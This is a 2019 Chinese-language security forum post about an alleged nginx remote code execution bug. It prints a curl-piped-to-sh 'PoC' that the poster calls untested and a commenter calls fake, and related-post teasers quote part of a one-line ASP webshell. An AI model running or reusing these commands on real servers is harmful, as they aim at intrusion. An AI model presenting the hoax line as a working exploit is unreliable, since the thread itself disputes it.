NGINX RCE - 資安

Lucy avatar
By Lucy
at 2019-06-01T10:58

Table of Contents

https://github.com/nginx/njs/issues/159

https://twitter.com/alisaesage/status/1134400951043874816

https://twitter.com/notdan/status/1134559331989434368

POC 的方式:

curl -gsS \
https://victim.server.here:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00 \
<'protocol:TCP' -O 0x0238f06a#PLToffset | \
sh; nc /dev/tcp/localhost


完全沒經過測試 不過先升級 nginx 就是對的

--
Tags: 資安

All Comments

Mary avatar
By Mary
at 2019-06-02T13:18
PoC 有人跳出來說是假的了

heap feng shui 的定義?

Faithe avatar
By Faithe
at 2019-05-30T12:46
最近 liveoverflow 開新系列學習 browser exploitation ,我也準備跟著他學習一下 本來打算先不碰 heap 但考慮到不少 js engine 文章都出現過 heap feng shui (堆風水) 這個技巧而且之前 heap exploit 感覺都沒學過,所以找了下 hea ...

一句話木馬

Damian avatar
By Damian
at 2019-05-26T04:20
andlt;恕刪andgt; : → newnovice: 請教st大 所以這個w算是拿到os的root shell嗎? 也能執 05/24 23:03 : → newnovice: 行任何資料庫的撈取? 05/24 23:03 : 推 s ...

一句話木馬

Edith avatar
By Edith
at 2019-05-25T11:22
※ 引述《newnovice (serenity)》之銘言: : 在網路上看到這個東東 : andlt;%at Page Language=and#34;Jscriptand#34; validateRequest=and#34;falseand#34; : %andgt;andlt;%Response.W ...

一句話木馬

Necoo avatar
By Necoo
at 2019-05-24T20:13
在網路上看到這個東東 andlt;%at Page Language=and#34;Jscriptand#34; validateRequest=and#34;falseand#34; %andgt;andlt;%Response.Write(eval(Request.Item[and#34;wand#34 ...

CVE-2019-0708

Hedy avatar
By Hedy
at 2019-05-20T15:09
# CVE-2019-0708[0] # 簡單來說:Windows 有一個 RCE 漏洞很嚴重 嚴重到說好 XP 不再更新也更新了 POC[1][2][3] 很多 如果想要為區塊鏈獻上一絲心力 想要維持區塊鏈的和平的話 可以不用更新 [0]: https://support.microsoft. ...